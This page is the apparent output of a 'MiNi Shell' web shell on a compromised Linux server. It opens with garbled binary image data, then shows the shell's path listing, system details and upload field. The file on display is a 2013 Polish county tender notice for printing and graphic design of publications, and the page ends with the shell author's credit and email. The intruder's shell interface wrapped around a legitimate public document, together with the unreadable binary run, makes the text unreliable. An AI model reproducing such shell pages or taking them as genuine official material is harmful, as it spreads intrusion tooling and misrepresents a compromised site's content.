JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130212/57644-N-2013.html

<p class="kh_header"><b>Świdwin: Przygotowanie graficzne, skład, łamanie i usługa drukowania wraz 
z dostawą</b><br>
<b>Numer ogłoszenia: 57644 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie graficzne, skład, łamanie i usługa drukowania wraz 
z dostawą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Przedmiotem zamówienia jest: Przygotowanie graficzne, skład, łamanie i usługa drukowania wraz z dostawą.

2	Projekt został współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.

3	Przedmiot zamówienia obejmuje m.in.:
przygotowanie graficzne, skład, łamanie i usługa drukowania wraz z dostawą obejmująca następujący zakres:

1.	Opracowanie graficzne, skład, łamanie i druk w pełnym kolorze wraz z dostawą: Publikacja I- Monografia  :
a)	format A5 po obcięciu, 
b)	do 160 stron (tekst do 260 tys. znaków) + okładka
c)	okładka: Wykonawca będzie zobowiązany do pozyskania we własnym zakresie elementów graficznych (zdjęć, rysunków, grafik, itp.) odpowiadających tematyce publikacji,
d)	nakład 150 szt., 
e)	środki papier 90 g/m2, monochromatyczny (1+1),
f)	oprawa klejona: 250 g/m2 , karton powlekany jednostronnie
 i zalaminowany folią jednostronnie,
g)	Wykonawca zobowiązuje się nadać nr ISBN,
h)	druk cyfrowy, Kolorystyka: 4+4 (CMYK),
i)	    termin wykonania zamówienia: 10 dni kalendarzowych od uzyskania pisemnego zatwierdzenia do druku.

2.	Opracowanie graficzne, skład, łamanie i druk w pełnym kolorze wraz z dostawą: Publikacja II- Informator dla instytucji:
a)	format A5 po obcięciu, 
b)	do 80 stron (w tym tekst do 107 tys. znaków), 
c)	nakład 300 szt.,
d)	środki: papier 90g/m2,
e)	oprawa klejona: 250 g/m2, karton powlekany jednostronnie i zalaminowana folią jednostronnie,
f)	druk cyfrowy, Kolorystyka: 4+4 (CMYK),
g)	Wykonawca będzie zobowiązany do pozyskania we własnym zakresie elementów graficznych (zdjęć, rysunków, grafik, itp.) odpowiadających tematyce publikacji - nie mniej niż 20% objętości tekstu ,,
h)	termin wykonania zamówienia: 10 dni kalendarzowych od uzyskania pisemnego zatwierdzenia do druku.

3.	Opracowanie graficzne, skład, łamanie i druk w pełnym kolorze wraz z dostawą: Publikacja III - Magazyn dla ofiar:
a)	format B5 po złożeniu, 
b)	tekst do 91 tys. znaków, 
c)	nakład 1000 szt., 
d)	środki: papier 135 g/m2, kreda
e)	oprawa szyta lub klejona: 250 g/m2 i zalaminowaną folią,
f)	druk cyfrowy, Kolorystyka: 4+4 (CMYK),
a)	Wykonawca będzie zobowiązany do pozyskania we własnym zakresie elementów graficznych (zdjęć, rysunków, grafik, itp.) odpowiadających tematyce publikacji -  nie mniej niż 30% objętości tekstu,
g)	termin wykonania zamówienia: 10 dni kalendarzowych od uzyskania pisemnego zatwierdzenia do druku.

4.	Opracowanie graficzne, skład, łamanie i druk w pełnym kolorze wraz z dostawą: Publikacja IV- Magazyn dla ofiar:
a)	format B5 po złożeniu, 
b)	tekst do 91 tys znaków, 
c)	nakład 1000 szt., 
d)	środki papier 135 g/m2, kreda,
e)	 oprawa szyta lub klejona: 250 g/m2 i zalaminowaną folią,
f)	druk cyfrowy, Kolorystyka: 4+4 (CMYK),
i)	Wykonawca będzie zobowiązany do pozyskania we własnym zakresie elementów graficznych (zdjęć, rysunków, grafik, itp.) odpowiadających tematyce publikacji - nie mniej niż 30% objętości tekstu ,
g)	termin wykonania zamówienia: nie później niż do 20 maja 2013 po przekazaniu materiałów przez Zamawiającego.

5.	Druk ulotek informacyjnych zgodnie z projektem graficznym (JPG) dostarczonym przez Zamawiającego (rozdzielczość 608 x 1231): 
a)	format: 1/3 A4 -DL (210 x 99 mm,
b)	papier kredowy: min. 135 g /m 2, matowy
c)	Kolorystyka: 4+4 (CMYK) (dwustronny kolor). 
d)	Ilość - 1.000 szt.
e)	termin wykonania zamówienia: 10 dni kalendarzowych od przekazania materiałów przez Zamawiającego
1.	Przygotowanie projektów graficznych Publikacji nr I, II, III, IV w tym okładek oraz projektów stron tytułowych i redakcyjnej oraz ulotki zgodnie z wymogami Zamawiającego:

a)	Projekt okładek Publikacji nr I, II, III, IV zgodny z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz spójna z kolorystyką zastosowaną na www.razemprzeciwrazom.pl

b)	Po zawarciu umowy z wybranym Wykonawcą, Zamawiający niezwłocznie przekaże Wykonawcy na jego wniosek niezbędne znaki graficzne, w szczególności logo projektu w wersji elektronicznej lub na nośniku elektronicznym (płyta CD/ DVD) w jednym z formatów: cdr, jpg, gif, tif., eps i pdf .

c)	Wykonawca wraz z publikacją po wstępnej akceptacji projektu zobowiązany będzie przedstawić Zamawiającemu odbitkę próbną (cromalin) projektu okładek. Wykonawca przedstawi również wydruk projektów kompletnych Publikacji nr I-  IV. Projekt Publikacji nr I - IV, w tym okładek oraz ulotki powinien zostać przekazany Zamawiającemu również w wersji elektronicznej w postaci zapisu w formacie pdf, za pośrednictwem poczty elektronicznej lub na nośniku informatycznym.

d)	Zamawiający, dokonując wyboru projektu publikacji, okładek, strony tytułowej i redakcyjnej ma prawo zgłaszania uwag lub wnoszenia zmian, które Wykonawca zobowiązany będzie uwzględnić przy przygotowaniu ostatecznej wersji publikacji (w tym również okładki, strony tytułowej i strony redakcyjnej). W przypadku zgłoszenia przez Zamawiającego uwag lub zmian Wykonawca, będzie zobowiązany niezwłocznie uwzględnić je w projekcie i ponownie przedstawić projekt publikacji wraz z wersją elektroniczną na nośniku magnetycznym (płyta CD/ DVD) lub za pośrednictwem poczty elektronicznej w postaci zapisu w formacie pdf. 

2.	Jeżeli w trakcie wykonania umowy zaistnieje potrzeba dostarczenia przez Zamawiającego, znajdujących się w jego posiadaniu dodatkowych materiałów dodruku, Zamawiający umożliwi dostęp do tych materiałów w terminie 2 dni roboczych od daty zgłoszenia takiej potrzeby przez Wykonawcę.

3.	W razie zwłoki w dostarczaniu materiałów określonych w pkt.2. j.w., Wykonawca może ustalić dodatkowe terminy dostarczenia materiałów z równoczesną zmianą ustalonego w umowie terminu wykonania wydruków.

4.	Wymogi jakościowe dotyczące przedmiotu zamówienia: 
a)	materiały drukowane,
b)	druk nierozmazujący się, 
c)	materiały drukowane czyste, niepogniecione, niesklejone, dobrze wyschnięte,
bez śladów odbitego druku, równo złożone, brzegi niepozaginane. 

5.	Wykonawca opracowuje:
a)	projekt graficzny, skład i łamanie tekstu oraz opracowanie komputerowe tablic, wykresów, map, tytułów opisów, układu tabelarycznego, indeksów, przypisów, bibliografii, numeracji stron, w tym przypisanie w spisie treści,
b)	redakcję techniczną,
c)	montaż elektroniczny publikacji.

6.	Wykonawca jest zobowiązany do:
a)	korekty językowej (sprawdzenie poprawności gramatycznej i pisowni),
b)	weryfikacji układu wizualnego tekstu oraz szaty graficznej publikacji po składzie, zgodnie z określonymi przez Zamawiającego wymaganiami.

7.	Wykonawca ma obowiązek uwzględniać i wprowadzać wszystkie uwagi Zamawiającego do wyglądu materiałów, jak również projektów graficznych. Zamawiający z tytułu wprowadzonych zmian nie będzie ponosił żadnych dodatkowych kosztów. 

8.	Wszystkie projekty muszą być kolorowe i atrakcyjne pod względem graficznym.  

9.	Wszystkie materiały powinny być zapakowane z należytą starannością w papier pakowy.  Każdą paczkę należy zabezpieczyć w sposób umożliwiający dalszy transport  i przesyłanie.

10.	Druk Publikacji nr I - IV oraz ulotek następuje po ich ostatecznym pisemnym zatwierdzeniu do druku przez Zamawiającego.

11.	Wykonawca przekaże Zamawiającemu ostateczną wersję przedmiotu zamówienia na nośniku elektronicznym w jednym z formatów: cdr, jpg, gif, tif., eps i PDF.

12.	Zamawiający zastrzega iż realizacja całości lub części przedmiotu zamówienia opisanego w Rozdziale 3 pkt. 3 ppkt. 5 jest uzależniona od uzyskania zgody Wojewódzkiego Urzędu Pracy w Szczecinie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.82.30.00-9, 79.82.25.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2) do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali min. 3 dostawy publikacji dotyczących przygotowania graficznego, składu, łamania i usługi drukowania wraz z dostawą, w tym jednocześnie wykonali min. 1 dostawę w zakresie oznakowania i wykonywania publikacji znakowanych znakami Funduszy Europejskich w okresie programowania 2007-2013</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Projekt umowy stanowi załącznik nr 4 do SIWZ.
2.	Zamawiający przewiduje możliwość zmiany umowy w następującym zakresie:
1) zmiany danych adresowych Zamawiającego lub Wykonawcy;
2) w przypadku jeżeli zmiana umowy jest korzystna dla Zamawiającego;
3) Wynagrodzenie Wykonawcy może ulec zmianie tylko w przypadku ustawowej zmiany stawki VAT. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.
3.	Wszelkie zmiany do umowy wymagają zgody obydwu stron pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Świdwinie, Biuro Projektu Razem Przeciw Razom, ul. Mieszka I 16 (pok.33), 78-300 Świdwin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Świdwinie, Biuro Projektu Razem Przeciw Razom, ul. Mieszka I 16 (pok.33), 78-300 Świdwin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt został współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com